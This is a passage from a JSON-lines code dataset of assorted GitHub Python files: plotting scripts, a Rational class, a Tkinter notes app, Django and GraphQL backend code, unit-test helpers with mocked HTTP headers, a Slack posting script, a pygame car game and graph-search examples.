matplotlib.pyplot as plt\nimport random\n\ndef createPlot() :\n # Générer des données aléatoires\n\n plt.clf()\n\n nombre_requetes = 100\n temps = list(range(nombre_requetes))\n valeurs = [random.randint(0, 100) for _ in range(nombre_requetes)]\n\n # Créer le graphique\n plt.plot(temps, valeurs)\n plt.xlabel('Temps')\n plt.ylabel('Nombre de requêtes')\n\n # Sauvegarder le graphique au format JPEG\n plt.savefig('static/img/graphique.jpg', format='jpeg')","repo_name":"pleijan/AwareNet","sub_path":"CreatePlot.py","file_name":"CreatePlot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31927559884","text":"import random\n\nclass Rational:\n def __init__(self, num, den):\n self.num = num\n self.den = den\n \n def mul(self, other):\n if isinstance(other, Rational):\n num = self.num * other.num\n den = self.den * other.den\n return Rational(num, den)\n elif isinstance(other, int):\n num = self.num * other\n return Rational(num, self.den)\n else:\n raise TypeError(\"Unsupported operand type(s) for *: '{}' and '{}'\".format(type(self), type(other)))\n \n def truediv(self, other):\n if isinstance(other, Rational):\n num = self.num * other.den\n den = self.den * other.num\n return Rational(num, den)\n elif isinstance(other, int):\n den = self.den * other\n return Rational(self.num, den)\n else:\n raise TypeError(\"Unsupported operand type(s) for /: '{}' and '{}'\".format(type(self), type(other)))\n \n @staticmethod\n def random_fraction(low, high):\n num = random.randint(low, high)\n den = random.randint(low, high)\n while den == 0:\n den = random.randint(low, high)\n return Rational(num, den)","repo_name":"NikitaKurganovich/BSUIR","sub_path":"MPL/Lab/Lab3/Part 1/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17707724767","text":"from tkinter import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom notes import notes\n\n\ndef registration_successfully_completed():\n btn.destroy()\n global folder_name\n lbl = Label(root, text='Приветствуем вас {}, авторизация успешно пройдена!!'.format(txt.get()))\n lbl.grid(column=0, row=0)\n folder_name = txt.get()\n txt.delete('0', END)\n txt.destroy()\n try:\n os.mkdir(f'{folder_name}')\n label = Label(root, text='Под вашим никнеймом предыдущих заметок не обнаружено')\n label.grid(column=0, row=2)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=3)\n except:\n found_old_files(folder_name)\n\n\ndef go_in_notes():\n notes(folder_name)\n\n\ndef found_old_files(entered_text):\n otvet = []\n row = 1\n try:\n for filename in os.listdir(f'{entered_text}'):\n with open(os.path.join(f'{entered_text}', filename), 'r') as file:\n text = file.read()\n found_files = (filename, 'с текстом:', text)\n otvet.append(found_files)\n label = Label(root, text='Под вашим никнеймом обнаружены следующие файлы:')\n label.grid(column=0, row=1)\n for i in range(len(otvet)):\n row += 1\n label = Label(root, text=f'{otvet[i][0]}' + ':' + ' ' + f'{otvet[i][2]}')\n label.grid(column=0, row=row)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=row + 1)\n except:\n return False\n\n\ndef user_registration():\n data = json.dumps(txt.get(), ensure_ascii=False)\n data = json.loads(str(data))\n\n with open('data.json', 'r') as filik:\n dict_data = json.load(filik)\n dict_data[f'{txt.get()}'] = ['авторизация успешно пройдена']\n\n with open('data.json', 'w') as file:\n json.dump(dict_data, file, ensure_ascii=False, indent=3)\n registration_successfully_completed()\n\n\ndef check_for_saved_users():\n with open('data.json', 'r') as file:\n a = file.read()\n a = json.loads(a)\n check = 0\n for element in a:\n if element == txt.get():\n registration_successfully_completed()\n break\n if element != txt.get():\n check += 1\n if check == len(a):\n user_registration()\n\n\nroot = Tk()\nroot.title('Авторизация в заметки')\nroot.geometry('450x450')\n\nmenu_bar = Menu(root)\nfile_menu = Menu(menu_bar)\n\nmessagebox.showinfo('Информация',\n 'Привет, вам нужно будет ввести ваш персональный никнейм, это нужно для предоставления именно ваших заметок!')\nlbl = Label(root, text='Введите свой никнейм!')\nlbl.grid(column=0, row=0)\ntxt = Entry(root, width=15)\ntxt.grid(column=1, row=0)\ntxt.focus()\nbtn = Button(root, text=\"ОК!\", command=check_for_saved_users)\nbtn.grid(column=2, row=2)\n\nroot.config(menu=menu_bar)\nroot.mainloop()\n","repo_name":"AppleIpx/python-notes","sub_path":"functions_for_the_notes.py","file_name":"functions_for_the_notes.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"45749032740","text":"import graphene\nimport graphql_jwt\n\n# import links.schema\n# import links.schema_relay\nimport users.schema\nimport rooms.schema\nimport msgs.schema\n\nclass Query(\n users.schema.Query,\n rooms.schema.Query,\n msgs.schema.Query,\n # links.schema.Query,\n # links.schema_relay.RelayQuery,\n graphene.ObjectType,\n):\n pass\n\n\nclass Mutation(\n users.schema.Mutation,\n rooms.schema.Mutation,\n msgs.schema.Mutation,\n # links.schema.Mutation,\n # links.schema_relay.RelayMutation,\n graphene.ObjectType,\n):\n\n login = graphql_jwt.ObtainJSONWebToken.Field()\n verify_token = graphql_jwt.Verify.Field()\n refresh_token = graphql_jwt.Refresh.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"rajzik/docker-webapp","sub_path":"server/webapp/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27144460030","text":"#!/usr/bin/env python\n\nimport argparse\nimport csv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.style.use('dark_background')\n\ndef read_csv(filename, has_header=True):\n rows = []\n with open(filename, 'r') as f:\n reader = csv.reader(f, delimiter=',')\n if has_header:\n header = tuple(map(str.rstrip, next(reader)))\n for line in reader:\n rows.append(tuple(map(float, line)))\n if not has_header:\n header = ('',) * len(rows[0])\n return header, rows\n\ndef read_gnuplot(filename):\n rows = []\n with open(filename, 'r') as f:\n for line in f:\n split_line = line.split()\n rows.append(tuple(map(float, split_line)))\n return [''] * len(rows[0]), rows\n\ndef plot_time_series(csv_filename, out_filename, ylim=None, title=None,\n ticks=None, nrows=1, case=''):\n styles = [\n {'color': '#00ffff', 'linewidth': 2},\n {'color': '#ff00ff', 'linewidth': 2},\n {'color': '#00cfcf', 'linewidth': 2},\n {'color': '#cf00cf', 'linewidth': 2},\n {'color': '#00afaf', 'linewidth': 2},\n {'color': '#af00af', 'linewidth': 2},\n {'color': '#008f8f', 'linewidth': 2},\n {'color': '#8f008f', 'linewidth': 2},\n {'color': '#006f6f', 'linewidth': 2},\n {'color': '#6f006f', 'linewidth': 2},\n ]\n header, rows = read_csv(csv_filename)\n series = list(map(np.array, zip(*rows)))\n t = series[0]\n\n if case == 'eigenvalues':\n # series[1:] = [np.sign(s) * np.log10(np.abs(s) + 1) for s in series[1:]]\n series[1:] = [np.log10(np.abs(s) + 1) for s in series[1:]]\n\n fig, axes = plt.subplots(nrows=nrows, sharex=True)\n\n if nrows == 1:\n axes = [axes]\n plot_multiple(axes[0], t, zip(styles, header[1:], series[1:]))\n elif nrows == 2:\n plot_multiple(axes[0], t, zip(styles[:-1], header[1:-1], series[1:-1]))\n plot_multiple(axes[1], t, [(styles[-1], header[-1], series[-1])])\n\n axes[0].set_title(title)\n axes[0].set_ylim(ylim)\n axes[-1].set_xlabel(header[0])\n for ax in axes:\n ax.legend(framealpha=0.9, loc='upper right')\n if ticks is not None:\n axes[-1].set_xlim((0.0, ticks[-1] + 0.5))\n axes[-1].set_xticks(ticks)\n fig.savefig(out_filename, dpi=300)\n\ndef plot_multiple(ax, x, it):\n for i, (style, label, data) in enumerate(it):\n mask = ~np.isnan(data)\n x_ = x[mask]\n data = data[mask]\n ax.plot(x_, data, label=label, zorder=-i, **style)\n\ndef main():\n parser = argparse.ArgumentParser(description='Plot.')\n parser.add_argument('infile', action='store')\n parser.add_argument('outfile', action='store')\n parser.add_argument('--time-series', action='store_true', default=False)\n parser.add_argument('--eigenvalues', action='store_true', default=False)\n parser.add_argument('--ticks', action='store', default=None)\n parser.add_argument('--nrows', action='store', type=int, default=1)\n parser.add_argument('--title', action='store', default='')\n args = parser.parse_args()\n\n if args.ticks is not None:\n args.ticks = [x\n for xs in read_csv(args.ticks, has_header=False)[1]\n for x in xs]\n args.ticks = [round(x, 1) for x in args.ticks]\n # print('Using ticks override: {}'.format(args.ticks))\n\n if args.time_series:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=args.nrows,\n ticks=args.ticks,\n title=args.title)\n\n if args.eigenvalues:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=1,\n case='eigenvalues',\n ticks=args.ticks,\n title=r'Energy eigenvalues')\n\nmain()\n","repo_name":"YodaEmbedding/experiments","sub_path":"fortran/phys395_hw5/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"24881268882","text":"from collections import deque\n\n# Definition who is seller from persons\ndef person_is_seller(name):\n return name[-1] == 'm'\n\n# Implementation breadth-first search algorithm\ndef breadth_search(name):\n search_queue = deque()\n search_queue += graph[\"You\"]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a mango seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\n# Define friends graph\ngraph = {}\ngraph[\"You\"] = [\"Alice\", \"Bob\", \"Claire\"]\ngraph[\"Bob\"] = [\"Anuj\", \"Peggy\"]\ngraph[\"Alice\"] = [\"Peggy\"]\ngraph[\"Claire\"] = [\"Thom\", \"Jonny\"]\ngraph[\"Anuj\"] = []\ngraph[\"Peggy\"] = []\ngraph[\"Thom\"] = []\ngraph[\"Jonny\"] = []\n\nif (not breadth_search(\"You\")):\n print(\"Mango sellers not found\")\n","repo_name":"grawitti/py_samples","sub_path":"grokking_algo/breadth_first_search.py","file_name":"breadth_first_search.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11308723246","text":"import unittest\nfrom copy import deepcopy\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass BaseWebRichObjectTestCase(unittest.TestCase):\n url = 'http://example.com'\n\n def _get_mock_attrs(self):\n func = getattr(self, self._testMethodName)\n return getattr(func, 'mock_attrs', None)\n\n def setUp(self):\n mock_attrs = self._get_mock_attrs()\n if mock_attrs is not None:\n self.patch = patch('web_rich_object.api.urlopen', **mock_attrs)\n self.patch.start()\n\n def tearDown(self):\n if self._get_mock_attrs() is not None:\n self.patch.stop()\n\nHTML_RESPONSE_INFO = {\n 'dict': {\n 'accept-ranges': 'bytes',\n 'cache-control': 'max-age=900',\n 'connection': 'close',\n 'content-length': '59593',\n 'content-type': 'text/html; charset=UTF-8',\n 'date': 'Sat, 17 Dec 2016 20:52:48 GMT',\n 'expires': 'Sat, 17 Dec 2016 21:06:53 GMT',\n 'server': 'Apache',\n 'x-adobe-content': 'AEM',\n 'x-ua-compatible': 'IE=11'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Server: Apache\\r\\n',\n 'X-UA-Compatible: IE=11\\r\\n',\n 'X-Adobe-Content: AEM\\r\\n',\n 'Accept-Ranges: bytes\\r\\n',\n 'Cache-Control: max-age=900\\r\\n',\n 'Expires: Sat, 17 Dec 2016 21:06:53 GMT\\r\\n',\n 'Content-Type: text/html; charset=UTF-8\\r\\n',\n 'Date: Sat, 17 Dec 2016 20:52:48 GMT\\r\\n',\n 'Content-Length: 59593\\r\\n',\n 'Content-Language: PT\\r\\n',\n 'Connection: close\\r\\n'\n ],\n 'maintype': 'text',\n 'plist': ['charset=UTF-8'],\n 'plisttext': '; charset=UTF-8',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'html',\n 'type': 'text/html',\n 'typeheader': 'text/html; charset=UTF-8',\n 'unixfrom': ''\n}\n\nPDF_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\nPDF_RESPONSE_INFO['maintype'] = 'application'\nPDF_RESPONSE_INFO['type'] = 'application'\nPDF_RESPONSE_INFO['subtype'] = 'pdf'\n\nIMAGE_RESPONSE_INFO = {\n 'dict': {\n 'cache-control': 'public, max-age=315360000',\n 'cf-cache-status': 'MISS',\n 'cf-ray': '312f513938bc6224-LIS',\n 'connection': 'close',\n 'content-length': '12141',\n 'content-type': 'image/png',\n 'date': 'Sun, 18 Dec 2016 02:52:11 GMT',\n 'etag': '\"63045090f550f37601888be65832f3e6\"',\n 'expires': 'Wed, 16 Dec 2026 02:52:11 GMT',\n 'last-modified': 'Tue, 18 Aug 2015 14:43:38 GMT',\n 'server': 'cloudflare-nginx',\n 'set-cookie': '__cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly',\n 'vary': 'Accept-Encoding',\n 'x-amz-storage-class': 'REDUCED_REDUNDANCY',\n 'x-amz-version-id': '4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Date: Sun, 18 Dec 2016 02:52:11 GMT\\r\\n',\n 'Content-Type: image/png\\r\\n',\n 'Content-Length: 12141\\r\\n',\n 'Connection: close\\r\\n',\n 'Set-Cookie: __cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly\\r\\n',\n 'Cache-Control: public, max-age=315360000\\r\\n',\n 'ETag: \"63045090f550f37601888be65832f3e6\"\\r\\n',\n 'Expires: Wed, 16 Dec 2026 02:52:11 GMT\\r\\n',\n 'Last-Modified: Tue, 18 Aug 2015 14:43:38 GMT\\r\\n',\n 'x-amz-storage-class: REDUCED_REDUNDANCY\\r\\n',\n 'x-amz-version-id: 4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL\\r\\n',\n 'CF-Cache-Status: MISS\\r\\n',\n 'Vary: Accept-Encoding\\r\\n',\n 'Server: cloudflare-nginx\\r\\n',\n 'CF-RAY: 312f513938bc6224-LIS\\r\\n'\n ],\n 'maintype': 'image',\n 'plist': [],\n 'plisttext': '',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'png',\n 'type': 'image/png',\n 'typeheader': 'image/png',\n 'unixfrom': ''\n}\n\nUNKNOW_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\ndel PDF_RESPONSE_INFO['headers'][UNKNOW_RESPONSE_INFO['headers'].index('Content-Language: PT\\r\\n')]\n","repo_name":"ZuluPro/web-rich-object","sub_path":"web_rich_object/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73353952115","text":"from valetapp.models.Booking.booking import Booking\nfrom valetapp.models.Users.customer import Customer\nfrom valetapp.models.Store.chainstore import ChainStore\nfrom valetapp.models.Valet.valet import Valet\nfrom valetapp.models.Users.membershiptype import MembershipType\nfrom valetapp.models.Users.staff import Staff\nfrom valetapp.views.Visitor.concreteVisitor import ConcreteVisitor\nfrom django.shortcuts import render\n\n\ndef getVisitor(request):\n bookings = Booking.objects.all()\n customers = Customer.objects.all()\n stores = ChainStore.objects.all()\n valets = Valet.objects.all()\n membershipTypes = MembershipType.objects.all()\n staffs = Staff.objects.all()\n visitor = ConcreteVisitor()\n\n total_sum = 0\n customer_emails_for_promotions = []\n store_names = []\n valet_types = []\n membership_types = []\n staff_members = []\n\n for booking in bookings:\n total_sum += booking.accept(visitor)\n for customer in customers:\n customer_emails_for_promotions.append(customer.accept(visitor))\n for store in stores:\n store_names.append(store.accept(visitor))\n for valet in valets:\n valet_types.append(valet.accept(visitor))\n for membershipType in membershipTypes:\n membership_types.append(membershipType.accept(visitor))\n for staff in staffs:\n staff_members.append(staff.accept(visitor))\n\n money_made_by_each_store = get_money_made_by_each_store(bookings, stores)\n\n export_to_CSV_object = {\n 'total_sum': total_sum,\n 'customers': customer_emails_for_promotions,\n 'store_names': store_names,\n 'valet_types': valet_types,\n 'membership_types': membership_types,\n 'staff_members': staff_members,\n 'money_made_by_each_store': money_made_by_each_store\n }\n\n return render(request, \"Booking/booking_list.html\", {'export_data': export_to_CSV_object})\n\n\ndef get_money_made_by_each_store(bookings, stores):\n money_made_by_store = []\n for store in stores:\n store_total = 0\n for booking in bookings:\n if(booking.get_store() == store):\n store_total += booking.get_price()\n money_made_by_store.append((store.get_name(), store_total))\n return money_made_by_store\n","repo_name":"dylank09/ValetSystem","sub_path":"valetproject/valetapp/views/Visitor/exportToCSV.py","file_name":"exportToCSV.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70301885233","text":"from django.shortcuts import render, render_to_response, redirect\nfrom HandBook.models import Class, Group, SubGroup, Company, HandBook\nfrom Elements.models import Element\nfrom Profile.models import Profile\nimport json\nfrom django.http.response import HttpResponse\nfrom django.template.context_processors import csrf\nimport pandas as pd\nfrom HandBook.export_Excel import export_df_to_excel\nfrom HandBook.export_PDF import export_df_to_pdf\nimport os\n\n# ----------------------------------- FUNCTIONS FOR CREATED HANDBOOK -------------------------\n\n\ndef remove_files(request):\n # filepath = 'QualificationWork/static/ExportFiles/'\n filepath = 'static/ExportFiles/'\n excel_file = filepath + request.user.username + '_excel_file.xlsx'\n pdf_file = filepath + request.user.username + '_pdf_file.pdf'\n os.remove(excel_file)\n os.remove(pdf_file)\n return HttpResponse('200')\n\n\ndef element_parameters(element, fields):\n fields_list = []\n for field in fields:\n parameter = element.__getattribute__(field)\n if not hasattr(parameter, 'name'):\n fields_list.append(parameter)\n else:\n fields_list.append(parameter.name)\n return fields_list\n\n\ndef create_dataframe(required_elements, elements_indexes=False):\n if elements_indexes:\n elements_ids = []\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n elements_ids.append(element.id)\n df.drop(['id'], axis=1, inplace=True)\n return df, elements_ids\n else:\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n df.drop(['id'], axis=1, inplace=True)\n return df\n\n\ndef create_handbook(request):\n args = {}\n args.update(csrf(request))\n args.update({\"username\": request.user.username})\n # file_path = 'QualificationWork/static/ExportFiles/'\n file_path = 'static/ExportFiles/'\n links = {\"pdf\": file_path + str(request.user.username) + '_pdf_file',\n \"excel\": file_path + str(request.user.username) + '_excel_file'}\n if request.POST:\n required_elements = [element for element in Element.objects.all() if request.POST.get(\"3_\" + str(element.id)) is not None]\n if len(required_elements) != 0:\n df, elements_ids = create_dataframe(required_elements, True)\n request.user.profile.set_coins(request.POST.get(\"coins\"))\n request.user.profile.save()\n handbook = HandBook(user=request.user,\n handbook_name=request.POST.get(\"handbook_name\"))\n handbook.set_elements(elements_ids)\n handbook.save()\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n args.update({\"columns\": df.columns})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n elements_ids = HandBook.objects.get(id=request.GET['handbook']).get_elements_ids()\n elements = Element.objects.filter(pk__in=elements_ids)\n df = create_dataframe(elements)\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n df_columns_names = ['Название', 'Компания', 'Класс', 'Группа', 'Подгруппа', 'Средняя наработка на отказ',\n 'Средний срок сохраняемости', 'Средний ресурс (ч)', 'Среднее время восстановления (ч)',\n 'Дополнительная Информация', 'Дата добавления', 'Подтверждающая ссылка']\n args.update({\"columns\": df_columns_names})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n\n\ndef delete_handbook(request):\n handbook_id = request.GET[\"id\"]\n handbook = HandBook.objects.get(id=handbook_id)\n handbook.delete()\n return redirect(\"/personal_account\")\n\n# ----------------------------------- FUNCTIONS FOR CREATING HANDBOOK -------------------------\n\n\ndef create_unique_id(object):\n models = [Class, Group, SubGroup, Element]\n for index, model in enumerate(models):\n if isinstance(object, model):\n return str(index) + \"_\" + str(object.id)\n\n\ndef choose_elements(request):\n args = {}\n args.update(csrf(request))\n classes = [{\"id\": create_unique_id(_class), \"name\": _class.name} for _class in Class.objects.all()]\n args.update({\"classes\": classes})\n args.update({\"username\": request.user.username})\n args.update({\"user\": request.user})\n return render_to_response(\"handbookCreatingExtension.html\", args)\n\n\ndef get_data_for_removing(id, model):\n if model is Class:\n groups = [object for object in Group.objects.filter(class_id=Class.objects.get(id=id))]\n subgroups = sum([[object for object in SubGroup.objects.filter(group_id=group)] for group in groups], [])\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (groups + subgroups + elements)]\n if model is Group:\n subgroups = [object for object in SubGroup.objects.filter(group_id=Group.objects.get(id=id))]\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (subgroups + elements)]\n if model is SubGroup:\n return [create_unique_id(object) for object in Element.objects.filter(Subgroup_id=SubGroup.objects.get(id=id))]\n\n\ndef collect_data(request):\n data = []\n models = [Class, Group, SubGroup, Element]\n model_id, object_id = str(request.GET[\"id\"]).split(\"_\")\n model = models[int(model_id)]\n event = int(request.GET[\"event\"])\n if event == 0:\n if model is Class:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Group.objects.filter(class_id=Class.objects.get(id=object_id))]\n if model is Group:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in SubGroup.objects.filter(group_id=Group.objects.get(id=object_id))]\n if model is SubGroup:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Element.objects.filter(Subgroup=SubGroup.objects.get(id=object_id))]\n else:\n data = get_data_for_removing(object_id, model)\n return HttpResponse(json.dumps(data))\n","repo_name":"Belket/QualificationWork","sub_path":"HandBook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28114062398","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä viiden kaupungin nimet yksi kerrallaan (käytä for-toistorakennetta nimien kysymiseen) ja tallentaa ne listarakenteeseen. \n# Lopuksi ohjelma tulostaa kaupunkien nimet yksi kerrallaan allekkain samassa järjestyksessä kuin ne syötettiin. \n# käytä for-toistorakennetta nimien kysymiseen ja for/in toistorakennetta niiden läpikäymiseen.\n\ncities = []\n\nfor i in range(5):\n city = input(\"Kirjoita kaupungin nimi: \")\n cities.append(city)\n\nfor city in cities:\n print(city)","repo_name":"kassu11/AMK-python","sub_path":"module05-homework/5.4-kaupunkien-kysely.py","file_name":"5.4-kaupunkien-kysely.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33638020436","text":"import json\nimport slack # module is called slackclient\n\n# Local image taken from https://ccsearch.creativecommons.org/photos/a376def5-1f22-4e28-b2f0-8cf67398afa8\n\n# Load global config\nwith open(\"../network_config/slack.json\") as slack_f:\n slack_settings = json.load(slack_f)\n\nOATH = slack_settings[\"OAUTH_TOKEN\"]\nWEBHOOK_URL = slack_settings[\"WEBHOOK\"]\nUSEWEBHOOK = slack_settings[\"USE_WEBHOOK\"] # set 1 in ../network_config/slack.json if you can't use OATH (no graph though)\nSLACKCHANNEL = slack_settings[\"CHANNEL\"]\n\nwith open(\"blocks.json\", \"rt\") as block_f:\n data = json.load(block_f)\n\nclient = slack.WebClient(token=OATH)\n\nclient.files_upload(\n channels=SLACKCHANNEL,\n file=\"slacks.jpg\",\n title=\"Local File\"\n)\nclient.chat_postMessage(\n channel=SLACKCHANNEL,\n blocks=data\n)\n","repo_name":"FrancisCrickInstitute/network_modules","sub_path":"_slack_post.py","file_name":"_slack_post.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21640744176","text":"import pygame\nimport math\nfrom pygame.locals import *\nfrom pygame.math import *\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nWHITE = [255, 255, 255]\n\ndef rot_center(image, rect, angle):\n \"\"\"rotate an image while keeping its center\"\"\"\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = rot_image.get_rect(center=rect.center)\n return rot_image,rot_rect\n\nclass Car(pygame.sprite.Sprite):\n \n def __init__(self, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('car_'+color+'.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (int(SCREEN_WIDTH/20), int(SCREEN_HEIGHT/20)))\n self.image = pygame.transform.rotate(self.image, 90)\n self.original_image = self.image \n \n self.mask = pygame.mask.from_surface(self.image)\n \n self.rect = self.image.get_rect()\n self.rect[0] = 50 \n self.rect[1] = 100 \n \n self.position = Vector2((self.rect[0], self.rect[1]))\n self.direction = Vector2(1, 0)\n \n self.speed = 0\n self.angle_speed = 0\n self.angle = 0\n #self.image, self.rect = rot_center(self.image, self.rect, 90)\n \n def update(self):\n if(self.angle_speed != 0):\n self.direction.rotate_ip(self.angle_speed)\n self.angle += self.angle_speed\n self.image = pygame.transform.rotate(self.original_image, -self.angle)\n self.rect = self.image.get_rect(center = self.rect.center)\n self.position += self.direction * self.speed\n self.rect.center = self.position\n \n #print(pygame.Surface.get_at((self.rect[0], self.rect[1])))\nclass Background(pygame.sprite.Sprite):\n \n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pista.png')\n self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n #self.mask = pygame.mask.from_threshold(self.image, pygame.Color('black'))\n self.mask = pygame.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\ndef clear_callback(surf, rect):\n color = 255, 255, 255\n surf.fill(color, rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.fill(WHITE)\n\nbackground_group = pygame.sprite.Group()\nBACKGROUND = Background()\nbackground_group.add(BACKGROUND)\n\ncar_group = pygame.sprite.Group()\ncar = Car('red')\ncar_group.add(car)\n\n\n\nclock = pygame.time.Clock()\nwhile True:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n car.speed += 1\n elif event.key == pygame.K_DOWN:\n car.speed -= 1\n elif event.key == pygame.K_LEFT:\n car.angle_speed = -3\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 3\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n car.angle_speed = 0\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 0\n clear_callback(screen, car.rect)\n screen.blit(BACKGROUND.image, (0, 0))\n car_group.update()\n car_group.draw(screen)\n\n\n \n pygame.display.update()\n \n\n if(pygame.sprite.groupcollide(car_group, background_group, False, False, pygame.sprite.collide_mask)):\n print(\"GAME OVER\")\n break\n\npygame.quit()\n","repo_name":"Iwazo8700/race_ia","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10246170641","text":"# -*- coding:utf-8 -*-\n\n\nfrom collections import deque\nfrom graph import Undigraph\n\n\ndef print_vertex_trace(prev, s, t, level=1):\n if prev[t] != -1 and t != s:\n print_vertex_trace(prev, s, prev[t], level+1)\n if level == 1:\n print(\"%d\" % t)\n else:\n print(\"%d -> \" % t, end=\"\")\n\n\ndef bfs(graph, s, t):\n if s == t:\n return \n queue = deque()\n prev = [ -1 ] * len(graph)\n visited = [False] * len(graph)\n visited[s] = True\n queue.append(s)\n while len(queue) > 0:\n vertex = queue.popleft()\n for adj_v in graph[vertex]:\n if not visited[adj_v]:\n prev[adj_v] = vertex\n if adj_v == t:\n return prev\n visited[adj_v] = True\n queue.append(adj_v)\n return prev\n\n\ndef recursive_dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n found = False\n def rdfs(s, t):\n nonlocal found\n if s == t:\n found = True\n return \n for v in graph[s][::-1]:\n if not visited[v]:\n visited[v] = True\n prev[v] = s\n rdfs(v, t)\n rdfs(s, t)\n return prev\n\n\ndef dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n stk = [s]\n visited[s] = True\n while len(stk) > 0:\n vertex = stk.pop()\n for v in graph[vertex]:\n if not visited[v]:\n prev[v] = vertex\n if t == v:\n return prev\n visited[v] = True\n stk.append(v)\n \n\nif __name__ == '__main__':\n g = Undigraph(8)\n g.add_edge(0, 1)\n g.add_edge(0, 3)\n g.add_edge(1, 2)\n g.add_edge(1, 4)\n g.add_edge(2, 5)\n g.add_edge(3, 4)\n 